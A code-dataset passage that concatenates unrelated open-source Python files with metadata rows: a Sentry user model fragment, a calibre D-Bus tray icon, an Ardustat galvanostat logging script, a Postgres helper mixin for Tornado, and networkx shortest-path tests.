super(User, self).delete() def save(self, *args, **kwargs): if not self.username: self.username = self.email return super(User, self).save(*args, **kwargs) def has_perm(self, perm_name): warnings.warn('User.has_perm is deprecated', DeprecationWarning) return self.is_superuser def has_module_perms(self, app_label): warnings.warn('User.has_module_perms is deprecated', DeprecationWarning) return self.is_superuser def get_unverified_emails(self): return self.emails.filter(is_verified=False) def get_verified_emails(self): return self.emails.filter(is_verified=True) def has_unverified_emails(self): return self.get_unverified_emails().exists() def get_label(self): return self.email or self.username or self.id def get_display_name(self): return self.name or self.email or self.username def get_full_name(self): return self.name def get_short_name(self): return self.username def get_salutation_name(self): name = self.name or self.username.split('@', 1)[0].split('.', 1)[0] first_name = name.split(' ', 1)[0] return first_name.capitalize() def get_avatar_type(self): avatar = self.avatar.first() if avatar: return avatar.get_avatar_type_display() return 'letter_avatar' def send_confirm_email_singular(self, email, is_new_user=False): from sentry import options from sentry.utils.email import MessageBuilder if not email.hash_is_valid(): email.set_hash() email.save() context = { 'user': self, 'url': absolute_uri( reverse('sentry-account-confirm-email', args=[self.id, email.validation_hash]) ), 'confirm_email': email.email, 'is_new_user': is_new_user, } msg = MessageBuilder( subject='%sConfirm Email' % (options.get('mail.subject-prefix'), ), template='sentry/emails/confirm_email.txt', html_template='sentry/emails/confirm_email.html', type='user.confirm_email', context=context, ) msg.send_async([email.email]) def send_confirm_emails(self, is_new_user=False): email_list = self.get_unverified_emails() for email in email_list: self.send_confirm_email_singular(email, is_new_user) def merge_to(from_user, to_user): # TODO: we could discover relations automatically and make this useful from sentry import roles from sentry.models import ( Activity, AuditLogEntry, AuthIdentity, Authenticator, GroupAssignee, GroupBookmark, GroupSeen, GroupShare, GroupSubscription, OrganizationMember, OrganizationMemberTeam, UserAvatar, UserEmail, UserOption, ) audit_logger.info( 'user.merge', extra={ 'from_user_id': from_user.id, 'to_user_id': to_user.id, } ) for obj in OrganizationMember.objects.filter(user=from_user): try: with transaction.atomic(): obj.update(user=to_user) except IntegrityError: pass # identify the highest priority membership to_member = OrganizationMember.objects.get( organization=obj.organization_id, user=to_user, ) if roles.get(obj.role).priority > roles.get(to_member.role).priority: to_member.update(role=obj.role) for team in obj.teams.all(): try: with transaction.atomic(): OrganizationMemberTeam.objects.create( organizationmember=to_member, team=team, ) except IntegrityError: pass model_list = ( Authenticator, GroupAssignee, GroupBookmark, GroupSeen, GroupShare, GroupSubscription, UserAvatar, UserEmail, UserOption, ) for model in model_list: for obj in model.objects.filter(user=from_user): try: with transaction.atomic(): obj.update(user=to_user) except IntegrityError: pass Activity.objects.filter( user=from_user, ).update(user=to_user) AuditLogEntry.objects.filter( actor=from_user, ).update(actor=to_user) AuditLogEntry.objects.filter( target_user=from_user, ).update(target_user=to_user) # remove any duplicate identities that exist on the current user that # might conflict w/ the new users existing SSO AuthIdentity.objects.filter( user=from_user, auth_provider__organization__in=AuthIdentity.objects.filter( user=to_user, ).values('auth_provider__organization') ).delete() AuthIdentity.objects.filter( user=from_user, ).update(user=to_user) def set_password(self, raw_password): super(User, self).set_password(raw_password) self.last_password_change = timezone.now() self.is_password_expired = False def refresh_session_nonce(self, request=None): from django.utils.crypto import get_random_string self.session_nonce = get_random_string(12) if request is not None: request.session['_nonce'] = self.session_nonce def get_orgs(self): from sentry.models import (Organization, OrganizationMember, OrganizationStatus) return Organization.objects.filter( status=OrganizationStatus.VISIBLE, id__in=OrganizationMember.objects.filter( user=self, ).values('organization'), ) def get_orgs_require_2fa(self): from sentry.models import (Organization, OrganizationStatus) return Organization.objects.filter( flags=models.F('flags').bitor(Organization.flags.require_2fa), status=OrganizationStatus.VISIBLE, member_set__user=self, ) def clear_lost_passwords(self): LostPasswordHash.objects.filter(user=self).delete() # HACK(dcramer): last_login needs nullable for Django 1.8 User._meta.get_field('last_login').null = True
bsd-3-clause
7,035,034,941,226,481,000
32.283019
106
0.595333
false
jelly/calibre
src/calibre/gui2/dbus_export/tray.py
1
7237
#!/usr/bin/env python2 # vim:fileencoding=utf-8 from __future__ import (unicode_literals, division, absolute_import, print_function) __license__ = 'GPL v3' __copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>' # Implement the StatusNotifierItem spec for creating a system tray icon in # modern linux desktop environments. See # http://www.notmart.org/misc/statusnotifieritem/index.html#introduction # This is not an actual standard, but is apparently used by GNOME, KDE and # Unity, which makes it necessary enough to implement. import os import dbus from PyQt5.Qt import ( QApplication, QObject, pyqtSignal, Qt, QPoint, QRect, QMenu, QSystemTrayIcon) from calibre.gui2.dbus_export.menu import DBusMenu from calibre.gui2.dbus_export.utils import icon_cache from calibre.utils.dbus_service import ( Object, method as dbus_method, BusName, dbus_property, signal as dbus_signal) _sni_count = 0 class StatusNotifierItem(QObject): IFACE = 'org.kde.StatusNotifierItem' activated = pyqtSignal(object) show_menu = pyqtSignal(int, int) def __init__(self, **kw): global _sni_count QObject.__init__(self, parent=kw.get('parent')) self.context_menu = None self.is_visible = True self.tool_tip = '' self._icon = QApplication.instance().windowIcon() self.show_menu.connect(self._show_menu, type=Qt.QueuedConnection) _sni_count += 1 kw['num'] = _sni_count self.dbus_api = StatusNotifierItemAPI(self, **kw) def _show_menu(self, x, y): m = self.contextMenu() if m is not None: m.exec_(QPoint(x, y)) def isVisible(self): return self.is_visible def setVisible(self, visible): if self.is_visible != visible: self.is_visible = visible self.dbus_api.NewStatus(self.dbus_api.Status) def show(self): self.setVisible(True) def hide(self): self.setVisible(False) def toggle(self): self.setVisible(not self.isVisible()) def contextMenu(self): return self.context_menu def setContextMenu(self, menu): self.context_menu = menu self.dbus_api.publish_new_menu() def geometry(self): return QRect() def toolTip(self): return self.tool_tip def setToolTip(self, val): self.tool_tip = val or '' self.dbus_api.NewToolTip() def setIcon(self, icon): self._icon = icon self.dbus_api.NewIcon() def icon(self): return self._icon @classmethod def supportsMessages(cls): return False def emit_activated(self): self.activated.emit(QSystemTrayIcon.Trigger) _status_item_menu_count = 0 class StatusNotifierItemAPI(Object): 'See http://www.notmart.org/misc/statusnotifieritem/statusnotifieritem.html' IFACE = 'org.kde.StatusNotifierItem' def __init__(self, notifier, **kw): global _status_item_menu_count self.notifier = notifier bus = kw.get('bus') if bus is None: bus = kw['bus'] = dbus.SessionBus() self.name = '%s-%s-%s' % (self.IFACE, os.getpid(), kw.get('num', 1)) self.dbus_name = BusName(self.name, bus=bus, do_not_queue=True) self.app_id = kw.get('app_id') or QApplication.instance().applicationName() or 'unknown_application' self.category = kw.get('category') or 'ApplicationStatus' self.title = kw.get('title') or self.app_id Object.__init__(self, bus, '/' + self.IFACE.split('.')[-1]) _status_item_menu_count += 1 self.dbus_menu = DBusMenu('/StatusItemMenu/%d' % _status_item_menu_count, bus=bus, parent=kw.get('parent')) def publish_new_menu(self): menu = self.notifier.contextMenu() if menu is None: menu = QMenu() if len(menu.actions()) == 0: menu.addAction(self.notifier.icon(), _('Show/hide %s') % self.title, self.notifier.emit_activated) # The menu must have at least one entry, namely the show/hide entry. # This is necessary as Canonical in their infinite wisdom decided to # force all tray icons to show their popup menus when clicked. self.dbus_menu.publish_new_menu(menu) @dbus_property(IFACE, signature='s') def IconName(self): return icon_cache().name_for_icon(self.notifier.icon()) @dbus_property(IFACE, signature='s') def IconThemePath(self): return icon_cache().icon_theme_path @dbus_property(IFACE, signature='a(iiay)') def IconPixmap(self): return dbus.Array(signature='(iiay)') @dbus_property(IFACE, signature='s') def OverlayIconName(self): return '' @dbus_property(IFACE, signature='(sa(iiay)ss)') def ToolTip(self): # This is ignored on Unity, Canonical believes in user interfaces # that are so functionality free that they dont need tooltips return self.IconName, self.IconPixmap, self.Title, self.notifier.toolTip() @dbus_property(IFACE, signature='a(iiay)') def OverlayIconPixmap(self): return dbus.Array(signature='(iiay)') @dbus_property(IFACE, signature='s') def AttentionIconName(self): return '' @dbus_property(IFACE, signature='a(iiay)') def AttentionIconPixmap(self): return dbus.Array(signature='(iiay)') @dbus_property(IFACE, signature='s') def Category(self): return self.category @dbus_property(IFACE, signature='s') def Id(self): return self.app_id @dbus_property(IFACE, signature='s') def Title(self): return self.title @dbus_property(IFACE, signature='s') def Status(self): return 'Active' if self.notifier.isVisible() else 'Passive' @dbus_property(IFACE, signature='o') def Menu(self): return dbus.ObjectPath(self.dbus_menu.object_path) @dbus_property(IFACE, signature='i') def WindowId(self): return 0 @dbus_method(IFACE, in_signature='ii', out_signature='') def ContextMenu(self, x, y): self.notifier.show_menu.emit(x, y) @dbus_method(IFACE, in_signature='ii', out_signature='') def Activate(self, x, y): self.notifier.activated.emit(QSystemTrayIcon.Trigger) @dbus_method(IFACE, in_signature='u', out_signature='') def XAyatanaSecondaryActivate(self, timestamp): # This is called when the user middle clicks the icon in Unity self.notifier.activated.emit(QSystemTrayIcon.MiddleClick) @dbus_method(IFACE, in_signature='ii', out_signature='') def SecondaryActivate(self, x, y): self.notifier.activated.emit(QSystemTrayIcon.MiddleClick) @dbus_method(IFACE, in_signature='is', out_signature='') def Scroll(self, delta, orientation): pass @dbus_signal(IFACE, '') def NewTitle(self): pass @dbus_signal(IFACE, '') def NewIcon(self): pass @dbus_signal(IFACE, '') def NewAttentionIcon(self): pass @dbus_signal(IFACE, '') def NewOverlayIcon(self): pass @dbus_signal(IFACE, '') def NewToolTip(self): pass @dbus_signal(IFACE, 's') def NewStatus(self, status): pass
gpl-3.0
-3,887,124,722,416,218,000
29.407563
115
0.637833
false
kjiang8/Ardustat
Deprecated_Unsupported/Python_Client/galvanostat_with_connect.py
1
1837
import numpy import ardustat_library_simple as ard import time import subprocess import os import glob import sys ##Guess a serial port port = "" if os.name == "posix": #try os x if len(glob.glob("/dev/tty.u*")) > 0: port = glob.glob("/dev/tty.u*")[0] elif len(glob.glob("/dev/ttyUSB*")) > 0: port = glob.glob("/dev/ttyUSB*")[0] else: print "can't see any ardustats. PEACE." sys.exit() print port #start a serial forwarder p = subprocess.Popen(("python tcp_serial_redirect.py "+port+" 57600").split()) print "waiting" time.sleep(5) print "going" #set parameters read_delay = .5 #second ardustat_id = 21 file_name = "galvanostat_test" ardustat_socket = 7777 debug = False pulse_time = 60*60*10 #Below here no touchy #connect to to ardustat and setup resistance table a = ard.ardustat() a.connect(ardustat_socket) a.debug = debug a.load_resistance_table(ardustat_id) a.ocv() a.groundvalue = 4 a.moveground() time.sleep(.2) a.ocv() #create arrays + a function for logging data times = [] potential = [] current = [] time_start = time.time() cycle = 0 file_name = file_name+"_"+str(int(time_start))+".dat" def appender(reading): if reading['valid']: print reading['cell_ADC'],read['current'] tdiff = str(time.time()-time_start) out = tdiff+","+str(reading['cell_ADC'])+","+str(read['current'])+","+str(cycle)+"\n" open(file_name,"a").write(out) else: print "bad read" #Step through values output = 0 a.ocv() for i in range(0,20): time.sleep(.1) read = a.parsedread() appender(read) start_pulse = time.time() a.galvanostat(-0.001) while (time.time()- start_pulse) < pulse_time: time.sleep(read_delay) read = a.parsedread() appender(read) start_pulse = time.time() a.ocv() while (time.time()- start_pulse) < 600: time.sleep(read_delay) read = a.parsedread() appender(read) p.kill()
bsd-2-clause
1,281,744,079,879,438,600
17.938144
87
0.672836
false
manhg/tokit
tokit/postgres.py
1
4462
import logging import shortuuid import uuid import momoko import momoko.exceptions import psycopg2 from psycopg2.extras import DictCursor, DictRow, register_uuid import psycopg2.extensions from tornado.gen import coroutine, sleep from tornado.web import HTTPError import tokit logger = tokit.logger class DictLogCursor(DictCursor): def execute(self, sql, args=None): logger.debug('Excute SQL: %s', self.mogrify(sql, args).decode()) return super().execute(sql, args) @tokit.on('init') def pg_init(app): """ Hook to init Postgres momoko driver. dsn config is required, with syntax same as Psycopg2 DSN. Sample env.ini:: [postgres] dsn=dbname=[APP_NAME] size=2 """ env = app.config.env['postgres'] if env.getboolean('log_momoko'): logging.getLogger('momoko').setLevel(logger.getEffectiveLevel()) momoko_opts = dict( dsn=env['dsn'], size=int(env['size']), max_size=int(env['max_size']), auto_shrink=env.getboolean('auto_shrink'), cursor_factory=(DictLogCursor if env.getboolean('log') else DictCursor), # connection_factory=env.get('connection_factory', None), ) register_uuid() app.pg_db = momoko.Pool(**momoko_opts) try: app.pg_db.connect() except momoko.PartiallyConnectedError: logger.error('Cannot connect') class PgMixin: DbIntegrityError = psycopg2.IntegrityError DbError = psycopg2.Error @property def db(self): return self.application.pg_db @coroutine def pg_insert(self, table, fields=None, **data): """ Postgres shorcut to insert data :return int new row's id Example:: user_id = yield self.pg_insert('users', {"username": "foo", "password": "secret"}) """ if fields: data = self.get_request_dict(*fields) else: fields = list(data.keys()) assert len(data) > 0 # check data values = list(data.values()) sql = 'INSERT INTO {} ({}) VALUES ({}) RETURNING id ' \ .format(table, ','.join(fields), ','.join(['%s'] * len(fields)) ) cursor = yield self.pg_query(sql, *values) return cursor.fetchone()[0] @coroutine def pg_getconn(self): try: connection = yield self.db.getconn() return connection except psycopg2.OperationalError: yield self.db.connect() yield sleep(0.5) try: connection = yield self.db.getconn() return connection except: raise HTTPError(503, "Database unavailable") except (momoko.Pool.DatabaseNotAvailable, momoko.exceptions.PartiallyConnectedError): raise HTTPError(503, "Database unavailable") @coroutine def pg_update(self, table, data): id_value = data.pop('id') changes = [field + ' = %s' for field in data.keys()] sql = 'UPDATE {} SET {} WHERE id = %s'.format(table, ','.join(changes)) values = list(data.values()) + [id_value] cursor = yield self.pg_query(sql, *values) return cursor @coroutine def pg_query(self, query, *params): """ Low level execuation """ connection = yield self.pg_getconn() with self.db.manage(connection): cursor = yield connection.execute(query, params) return cursor def pg_serialize(self, row): if not row: return ret = dict(row) if isinstance(row, DictRow) else row return ret @coroutine def pg_select(self, query, *params): """ Query and convert each returned row :return generator """ result = yield self.pg_query(query, *params) return (self.pg_serialize(row) for row in result.fetchall()) @coroutine def pg_one(self, query, *params): result = yield self.pg_query(query, *params) row = result.fetchone() if row: return self.pg_serialize(row) db_insert = pg_insert db_update = pg_update db_query = pg_query db_select = pg_select db_one = pg_one class UidMixin: def pg_serialize(self, row): ret = PgMixin.pg_serialize(self, row) if 'id' in ret: ret['short_id'] = shortuuid.encode(ret['id']) return ret
mit
4,795,081,817,502,400,000
27.240506
94
0.586732
false
sserrot/champion_relationships
venv/Lib/site-packages/networkx/algorithms/shortest_paths/tests/test_weighted.py
1
27666
import pytest import networkx as nx from networkx.utils import pairwise def validate_path(G, s, t, soln_len, path): assert path[0] == s assert path[-1] == t if not G.is_multigraph(): computed = sum(G[u][v].get('weight', 1) for u, v in pairwise(path)) assert soln_len == computed else: computed = sum(min(e.get('weight', 1) for e in G[u][v].values()) for u, v in pairwise(path)) assert soln_len == computed def validate_length_path(G, s, t, soln_len, length, path): assert soln_len == length validate_path(G, s, t, length, path) class WeightedTestBase(object): """Base class for test classes that test functions for computing shortest paths in weighted graphs. """ def setup(self): """Creates some graphs for use in the unit tests.""" cnlti = nx.convert_node_labels_to_integers self.grid = cnlti(nx.grid_2d_graph(4, 4), first_label=1, ordering="sorted") self.cycle = nx.cycle_graph(7) self.directed_cycle = nx.cycle_graph(7, create_using=nx.DiGraph()) self.XG = nx.DiGraph() self.XG.add_weighted_edges_from([('s', 'u', 10), ('s', 'x', 5), ('u', 'v', 1), ('u', 'x', 2), ('v', 'y', 1), ('x', 'u', 3), ('x', 'v', 5), ('x', 'y', 2), ('y', 's', 7), ('y', 'v', 6)]) self.MXG = nx.MultiDiGraph(self.XG) self.MXG.add_edge('s', 'u', weight=15) self.XG2 = nx.DiGraph() self.XG2.add_weighted_edges_from([[1, 4, 1], [4, 5, 1], [5, 6, 1], [6, 3, 1], [1, 3, 50], [1, 2, 100], [2, 3, 100]]) self.XG3 = nx.Graph() self.XG3.add_weighted_edges_from([[0, 1, 2], [1, 2, 12], [2, 3, 1], [3, 4, 5], [4, 5, 1], [5, 0, 10]]) self.XG4 = nx.Graph() self.XG4.add_weighted_edges_from([[0, 1, 2], [1, 2, 2], [2, 3, 1], [3, 4, 1], [4, 5, 1], [5, 6, 1], [6, 7, 1], [7, 0, 1]]) self.MXG4 = nx.MultiGraph(self.XG4) self.MXG4.add_edge(0, 1, weight=3) self.G = nx.DiGraph() # no weights self.G.add_edges_from([('s', 'u'), ('s', 'x'), ('u', 'v'), ('u', 'x'), ('v', 'y'), ('x', 'u'), ('x', 'v'), ('x', 'y'), ('y', 's'), ('y', 'v')]) class TestWeightedPath(WeightedTestBase): def test_dijkstra(self): (D, P) = nx.single_source_dijkstra(self.XG, 's') validate_path(self.XG, 's', 'v', 9, P['v']) assert D['v'] == 9 validate_path( self.XG, 's', 'v', 9, nx.single_source_dijkstra_path(self.XG, 's')['v']) assert dict( nx.single_source_dijkstra_path_length(self.XG, 's'))['v'] == 9 validate_path( self.XG, 's', 'v', 9, nx.single_source_dijkstra(self.XG, 's')[1]['v']) validate_path( self.MXG, 's', 'v', 9, nx.single_source_dijkstra_path(self.MXG, 's')['v']) GG = self.XG.to_undirected() # make sure we get lower weight # to_undirected might choose either edge with weight 2 or weight 3 GG['u']['x']['weight'] = 2 (D, P) = nx.single_source_dijkstra(GG, 's') validate_path(GG, 's', 'v', 8, P['v']) assert D['v'] == 8 # uses lower weight of 2 on u<->x edge validate_path(GG, 's', 'v', 8, nx.dijkstra_path(GG, 's', 'v')) assert nx.dijkstra_path_length(GG, 's', 'v') == 8 validate_path(self.XG2, 1, 3, 4, nx.dijkstra_path(self.XG2, 1, 3)) validate_path(self.XG3, 0, 3, 15, nx.dijkstra_path(self.XG3, 0, 3)) assert nx.dijkstra_path_length(self.XG3, 0, 3) == 15 validate_path(self.XG4, 0, 2, 4, nx.dijkstra_path(self.XG4, 0, 2)) assert nx.dijkstra_path_length(self.XG4, 0, 2) == 4 validate_path(self.MXG4, 0, 2, 4, nx.dijkstra_path(self.MXG4, 0, 2)) validate_path( self.G, 's', 'v', 2, nx.single_source_dijkstra(self.G, 's', 'v')[1]) validate_path( self.G, 's', 'v', 2, nx.single_source_dijkstra(self.G, 's')[1]['v']) validate_path(self.G, 's', 'v', 2, nx.dijkstra_path(self.G, 's', 'v')) assert nx.dijkstra_path_length(self.G, 's', 'v') == 2 # NetworkXError: node s not reachable from moon pytest.raises(nx.NetworkXNoPath, nx.dijkstra_path, self.G, 's', 'moon') pytest.raises( nx.NetworkXNoPath, nx.dijkstra_path_length, self.G, 's', 'moon') validate_path(self.cycle, 0, 3, 3, nx.dijkstra_path(self.cycle, 0, 3)) validate_path(self.cycle, 0, 4, 3, nx.dijkstra_path(self.cycle, 0, 4)) assert nx.single_source_dijkstra(self.cycle, 0, 0) == (0, [0]) def test_bidirectional_dijkstra(self): validate_length_path( self.XG, 's', 'v', 9, *nx.bidirectional_dijkstra(self.XG, 's', 'v')) validate_length_path( self.G, 's', 'v', 2, *nx.bidirectional_dijkstra(self.G, 's', 'v')) validate_length_path( self.cycle, 0, 3, 3, *nx.bidirectional_dijkstra(self.cycle, 0, 3)) validate_length_path( self.cycle, 0, 4, 3, *nx.bidirectional_dijkstra(self.cycle, 0, 4)) validate_length_path( self.XG3, 0, 3, 15, *nx.bidirectional_dijkstra(self.XG3, 0, 3)) validate_length_path( self.XG4, 0, 2, 4, *nx.bidirectional_dijkstra(self.XG4, 0, 2)) # need more tests here P = nx.single_source_dijkstra_path(self.XG, 's')['v'] validate_path(self.XG, 's', 'v', sum(self.XG[u][v]['weight'] for u, v in zip( P[:-1], P[1:])), nx.dijkstra_path(self.XG, 's', 'v')) # check absent source G = nx.path_graph(2) pytest.raises(nx.NodeNotFound, nx.bidirectional_dijkstra, G, 3, 0) def test_bidirectional_dijkstra_no_path(self): with pytest.raises(nx.NetworkXNoPath): G = nx.Graph() nx.add_path(G, [1, 2, 3]) nx.add_path(G, [4, 5, 6]) path = nx.bidirectional_dijkstra(G, 1, 6) def test_absent_source(self): # the check is in _dijkstra_multisource, but this will provide # regression testing against later changes to any of the "client" # Dijkstra or Bellman-Ford functions G = nx.path_graph(2) for fn in (nx.dijkstra_path, nx.dijkstra_path_length, nx.single_source_dijkstra_path, nx.single_source_dijkstra_path_length, nx.single_source_dijkstra, nx.dijkstra_predecessor_and_distance,): pytest.raises(nx.NodeNotFound, fn, G, 3, 0) def test_dijkstra_predecessor1(self): G = nx.path_graph(4) assert (nx.dijkstra_predecessor_and_distance(G, 0) == ({0: [], 1: [0], 2: [1], 3: [2]}, {0: 0, 1: 1, 2: 2, 3: 3})) def test_dijkstra_predecessor2(self): # 4-cycle G = nx.Graph([(0, 1), (1, 2), (2, 3), (3, 0)]) pred, dist = nx.dijkstra_predecessor_and_distance(G, (0)) assert pred[0] == [] assert pred[1] == [0] assert pred[2] in [[1, 3], [3, 1]] assert pred[3] == [0] assert dist == {0: 0, 1: 1, 2: 2, 3: 1} def test_dijkstra_predecessor3(self): XG = nx.DiGraph() XG.add_weighted_edges_from([('s', 'u', 10), ('s', 'x', 5), ('u', 'v', 1), ('u', 'x', 2), ('v', 'y', 1), ('x', 'u', 3), ('x', 'v', 5), ('x', 'y', 2), ('y', 's', 7), ('y', 'v', 6)]) (P, D) = nx.dijkstra_predecessor_and_distance(XG, 's') assert P['v'] == ['u'] assert D['v'] == 9 (P, D) = nx.dijkstra_predecessor_and_distance(XG, 's', cutoff=8) assert not 'v' in D def test_single_source_dijkstra_path_length(self): pl = nx.single_source_dijkstra_path_length assert dict(pl(self.MXG4, 0))[2] == 4 spl = pl(self.MXG4, 0, cutoff=2) assert not 2 in spl def test_bidirectional_dijkstra_multigraph(self): G = nx.MultiGraph() G.add_edge('a', 'b', weight=10) G.add_edge('a', 'b', weight=100) dp = nx.bidirectional_dijkstra(G, 'a', 'b') assert dp == (10, ['a', 'b']) def test_dijkstra_pred_distance_multigraph(self): G = nx.MultiGraph() G.add_edge('a', 'b', key='short', foo=5, weight=100) G.add_edge('a', 'b', key='long', bar=1, weight=110) p, d = nx.dijkstra_predecessor_and_distance(G, 'a') assert p == {'a': [], 'b': ['a']} assert d == {'a': 0, 'b': 100} def test_negative_edge_cycle(self): G = nx.cycle_graph(5, create_using=nx.DiGraph()) assert nx.negative_edge_cycle(G) == False G.add_edge(8, 9, weight=-7) G.add_edge(9, 8, weight=3) graph_size = len(G) assert nx.negative_edge_cycle(G) == True assert graph_size == len(G) pytest.raises(ValueError, nx.single_source_dijkstra_path_length, G, 8) pytest.raises(ValueError, nx.single_source_dijkstra, G, 8) pytest.raises(ValueError, nx.dijkstra_predecessor_and_distance, G, 8) G.add_edge(9, 10) pytest.raises(ValueError, nx.bidirectional_dijkstra, G, 8, 10) def test_weight_function(self): """Tests that a callable weight is interpreted as a weight function instead of an edge attribute. """ # Create a triangle in which the edge from node 0 to node 2 has # a large weight and the other two edges have a small weight. G = nx.complete_graph(3) G.adj[0][2]['weight'] = 10 G.adj[0][1]['weight'] = 1 G.adj[1][2]['weight'] = 1 # The weight function will take the multiplicative inverse of # the weights on the edges. This way, weights that were large # before now become small and vice versa. def weight(u, v, d): return 1 / d['weight'] # The shortest path from 0 to 2 using the actual weights on the # edges should be [0, 1, 2]. distance, path = nx.single_source_dijkstra(G, 0, 2) assert distance == 2 assert path == [0, 1, 2] # However, with the above weight function, the shortest path # should be [0, 2], since that has a very small weight. distance, path = nx.single_source_dijkstra(G, 0, 2, weight=weight) assert distance == 1 / 10 assert path == [0, 2] def test_all_pairs_dijkstra_path(self): cycle = nx.cycle_graph(7) p = dict(nx.all_pairs_dijkstra_path(cycle)) assert p[0][3] == [0, 1, 2, 3] cycle[1][2]['weight'] = 10 p = dict(nx.all_pairs_dijkstra_path(cycle)) assert p[0][3] == [0, 6, 5, 4, 3] def test_all_pairs_dijkstra_path_length(self): cycle = nx.cycle_graph(7) pl = dict(nx.all_pairs_dijkstra_path_length(cycle)) assert pl[0] == {0: 0, 1: 1, 2: 2, 3: 3, 4: 3, 5: 2, 6: 1} cycle[1][2]['weight'] = 10 pl = dict(nx.all_pairs_dijkstra_path_length(cycle)) assert pl[0] == {0: 0, 1: 1, 2: 5, 3: 4, 4: 3, 5: 2, 6: 1} def test_all_pairs_dijkstra(self): cycle = nx.cycle_graph(7) out = dict(nx.all_pairs_dijkstra(cycle)) assert out[0][0] == {0: 0, 1: 1, 2: 2, 3: 3, 4: 3, 5: 2, 6: 1} assert out[0][1][3] == [0, 1, 2, 3] cycle[1][2]['weight'] = 10 out = dict(nx.all_pairs_dijkstra(cycle)) assert out[0][0] == {0: 0, 1: 1, 2: 5, 3: 4, 4: 3, 5: 2, 6: 1} assert out[0][1][3] == [0, 6, 5, 4, 3] class TestDijkstraPathLength(object): """Unit tests for the :func:`networkx.dijkstra_path_length` function. """ def test_weight_function(self): """Tests for computing the length of the shortest path using Dijkstra's algorithm with a user-defined weight function. """ # Create a triangle in which the edge from node 0 to node 2 has # a large weight and the other two edges have a small weight. G = nx.complete_graph(3) G.adj[0][2]['weight'] = 10 G.adj[0][1]['weight'] = 1 G.adj[1][2]['weight'] = 1 # The weight function will take the multiplicative inverse of # the weights on the edges. This way, weights that were large # before now become small and vice versa. def weight(u, v, d): return 1 / d['weight'] # The shortest path from 0 to 2 using the actual weights on the # edges should be [0, 1, 2]. However, with the above weight # function, the shortest path should be [0, 2], since that has a # very small weight. length = nx.dijkstra_path_length(G, 0, 2, weight=weight) assert length == 1 / 10 class TestMultiSourceDijkstra(object): """Unit tests for the multi-source dialect of Dijkstra's shortest path algorithms. """ def test_no_sources(self): with pytest.raises(ValueError): nx.multi_source_dijkstra(nx.Graph(), {}) def test_path_no_sources(self): with pytest.raises(ValueError): nx.multi_source_dijkstra_path(nx.Graph(), {}) def test_path_length_no_sources(self): with pytest.raises(ValueError): nx.multi_source_dijkstra_path_length(nx.Graph(), {}) def test_absent_source(self): G = nx.path_graph(2) for fn in (nx.multi_source_dijkstra_path, nx.multi_source_dijkstra_path_length, nx.multi_source_dijkstra,): pytest.raises(nx.NodeNotFound, fn, G, [3], 0) def test_two_sources(self): edges = [(0, 1, 1), (1, 2, 1), (2, 3, 10), (3, 4, 1)] G = nx.Graph() G.add_weighted_edges_from(edges) sources = {0, 4} distances, paths = nx.multi_source_dijkstra(G, sources) expected_distances = {0: 0, 1: 1, 2: 2, 3: 1, 4: 0} expected_paths = {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [4, 3], 4: [4]} assert distances == expected_distances assert paths == expected_paths def test_simple_paths(self): G = nx.path_graph(4) lengths = nx.multi_source_dijkstra_path_length(G, [0]) assert lengths == {n: n for n in G} paths = nx.multi_source_dijkstra_path(G, [0]) assert paths == {n: list(range(n + 1)) for n in G} class TestBellmanFordAndGoldbergRadzik(WeightedTestBase): def test_single_node_graph(self): G = nx.DiGraph() G.add_node(0) assert nx.single_source_bellman_ford_path(G, 0) == {0: [0]} assert nx.single_source_bellman_ford_path_length(G, 0) == {0: 0} assert nx.single_source_bellman_ford(G, 0) == ({0: 0}, {0: [0]}) assert nx.bellman_ford_predecessor_and_distance(G, 0) == ({0: []}, {0: 0}) assert nx.goldberg_radzik(G, 0) == ({0: None}, {0: 0}) def test_absent_source_bellman_ford(self): # the check is in _bellman_ford; this provides regression testing # against later changes to "client" Bellman-Ford functions G = nx.path_graph(2) for fn in (nx.bellman_ford_predecessor_and_distance, nx.bellman_ford_path, nx.bellman_ford_path_length, nx.single_source_bellman_ford_path, nx.single_source_bellman_ford_path_length, nx.single_source_bellman_ford,): pytest.raises(nx.NodeNotFound, fn, G, 3, 0) def test_absent_source_goldberg_radzik(self): with pytest.raises(nx.NodeNotFound): G = nx.path_graph(2) nx.goldberg_radzik(G, 3, 0) def test_negative_weight_cycle(self): G = nx.cycle_graph(5, create_using=nx.DiGraph()) G.add_edge(1, 2, weight=-7) for i in range(5): pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, i) pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, i) pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, i) pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, i) pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, i) G = nx.cycle_graph(5) # undirected Graph G.add_edge(1, 2, weight=-3) for i in range(5): pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, i) pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, i) pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, i) pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, i) pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, i) G = nx.DiGraph([(1, 1, {'weight': -1})]) pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path, G, 1) pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford_path_length, G, 1) pytest.raises(nx.NetworkXUnbounded, nx.single_source_bellman_ford, G, 1) pytest.raises(nx.NetworkXUnbounded, nx.bellman_ford_predecessor_and_distance, G, 1) pytest.raises(nx.NetworkXUnbounded, nx.goldberg_radzik, G, 1) # no negative cycle but negative weight G = nx.cycle_graph(5, create_using=nx.DiGraph()) G.add_edge(1, 2, weight=-3) assert (nx.single_source_bellman_ford_path(G, 0) == {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3], 4: [0, 1, 2, 3, 4]}) assert (nx.single_source_bellman_ford_path_length(G, 0) == {0: 0, 1: 1, 2: -2, 3: -1, 4: 0}) assert (nx.single_source_bellman_ford(G, 0) == ({0: 0, 1: 1, 2: -2, 3: -1, 4: 0}, {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3], 4: [0, 1, 2, 3, 4]})) assert (nx.bellman_ford_predecessor_and_distance(G, 0) == ({0: [], 1: [0], 2: [1], 3: [2], 4: [3]}, {0: 0, 